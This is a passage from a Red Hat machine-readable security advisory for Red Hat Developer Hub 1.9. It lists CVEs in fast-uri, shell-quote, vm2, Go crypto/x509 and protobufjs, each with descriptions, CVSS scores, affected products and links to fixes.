          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2466582"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by providing a specially crafted Uniform Resource Locator (URL) containing percent-encoded path separators and dot segments. Due to incorrect processing, fast-uri would decode these elements before proper normalization, leading to distinct URLs resolving to the same internal path. This could allow an attacker to bypass security policies that rely on path-based comparisons, potentially gaining unauthorized access to resources.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "fast-uri: fast-uri: Path traversal vulnerability allows bypass of security policies",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-6321"
        },
        {
          "category": "external",
          "summary": "RHBZ#2466582",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466582"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-6321",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6321"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6",
          "url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6"
        }
      ],
      "release_date": "2026-05-04T19:31:57.253000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "fast-uri: fast-uri: Path traversal vulnerability allows bypass of security policies"
    },
    {
      "cve": "CVE-2026-6322",
      "cwe": {
        "id": "CWE-140",
        "name": "Improper Neutralization of Delimiters"
      },
      "discovery_date": "2026-05-05T11:01:00.332189+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2466684"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by crafting a malicious Uniform Resource Identifier (URI) that contains percent-encoded authority delimiters. The fast-uri library incorrectly decodes these delimiters during normalization and then re-emits them as raw separators, which can change the URI\u0027s intended authority. This issue allows applications that perform host allowlist checks, redirect validation, or outbound request routing to be steered to a different authority than specified, potentially bypassing security controls.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "fast-uri: fast-uri: URI authority bypass due to improper delimiter handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-6322"
        },
        {
          "category": "external",
          "summary": "RHBZ#2466684",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466684"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-6322",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6322"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc",
          "url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc"
        }
      ],
      "release_date": "2026-05-05T10:29:16.378000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "fast-uri: fast-uri: URI authority bypass due to improper delimiter handling"
    },
    {
      "cve": "CVE-2026-9277",
      "cwe": {
        "id": "CWE-78",
        "name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
      },
      "discovery_date": "2026-05-22T14:01:14.427751+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2480741"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the shell-quote component. The quote() function did not properly validate object-token inputs, allowing line terminators to pass unescaped into the output. A remote attacker could exploit this vulnerability by providing specially crafted input, which a POSIX shell would interpret as a command separator. This could lead to command injection, enabling the attacker to execute arbitrary code on the system.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-9277"
        },
        {
          "category": "external",
          "summary": "RHBZ#2480741",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480741"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-9277",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9277"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-9277",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9277"
        },
        {
          "category": "external",
          "summary": "https://github.com/ljharb/shell-quote",
          "url": "https://github.com/ljharb/shell-quote"
        },
        {
          "category": "external",
          "summary": "https://github.com/ljharb/shell-quote/commit/1518179",
          "url": "https://github.com/ljharb/shell-quote/commit/1518179"
        },
        {
          "category": "external",
          "summary": "https://github.com/ljharb/shell-quote/security/advisories/GHSA-w7jw-789q-3m8p",
          "url": "https://github.com/ljharb/shell-quote/security/advisories/GHSA-w7jw-789q-3m8p"
        },
        {
          "category": "external",
          "summary": "https://www.npmjs.com/package/shell-quote",
          "url": "https://www.npmjs.com/package/shell-quote"
        }
      ],
      "release_date": "2026-05-22T13:22:38.873000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators"
    },
    {
      "cve": "CVE-2026-24781",
      "cwe": {
        "id": "CWE-653",
        "name": "Improper Isolation or Compartmentalization"
      },
      "discovery_date": "2026-05-04T19:03:41.437468+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2466531"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows an attacker to escape the sandbox environment by exploiting the `inspect` function. Successful exploitation can lead to arbitrary code execution on the host system, compromising the integrity and confidentiality of the system.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-24781"
        },
        {
          "category": "external",
          "summary": "RHBZ#2466531",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466531"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-24781",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24781"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24781",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24781"
        },
        {
          "category": "external",
          "summary": "https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189",
          "url": "https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189"
        },
        {
          "category": "external",
          "summary": "https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c",
          "url": "https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c"
        },
        {
          "category": "external",
          "summary": "https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228",
          "url": "https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228"
        },
        {
          "category": "external",
          "summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0",
          "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c",
          "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c"
        }
      ],
      "release_date": "2026-05-04T16:33:32.869000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function"
    },
    {
      "cve": "CVE-2026-32281",
      "cwe": {
        "id": "CWE-1050",
        "name": "Excessive Platform Resource Consumption within a Loop"
      },
      "discovery_date": "2026-04-08T02:01:00.930989+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456333"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go\u0027s `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw occurs during the validation of otherwise trusted certificate chains that contain a large number of policy mappings, leading to excessive resource consumption. Exploitation requires an attacker to present a specially crafted, yet trusted, certificate chain which would require the attacker has already compromised a trusted certificate root. Red Hat continuously monitors certificate authorities and curates the set which is trusted by default for Red Hat products.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456333",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456333"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32281",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758061",
          "url": "https://go.dev/cl/758061"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78281",
          "url": "https://go.dev/issue/78281"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4946",
          "url": "https://pkg.go.dev/vuln/GO-2026-4946"
        }
      ],
      "release_date": "2026-04-08T01:06:58.354000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation"
    },
    {
      "cve": "CVE-2026-41242",
      "cwe": {
        "id": "CWE-94",
        "name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
      },
      "discovery_date": "2026-04-18T17:00:50.677423+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2459442"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in protobufjs, a JavaScript (JS) library used for compiling protobuf definitions. A remote attacker with low privileges can exploit this vulnerability by injecting arbitrary code into the \"type\" fields of protobuf definitions. This malicious code will then execute during the object decoding process, leading to arbitrary code execution and potentially full system compromise.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "protobufjs: protobufjs: Arbitrary code execution via injected protobuf definition type fields",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-41242"
        },
        {
          "category": "external",
          "summary": "RHBZ#2459442",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2459442"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-41242",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41242"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41242",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41242"
        },
        {
          "category": "external",
          "summary": "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75",
          "url": "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75"
        },
        {
          "category": "external",
          "summary": "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956",
          "url": "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956"
        },
        {
          "category": "external",
          "summary": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5",
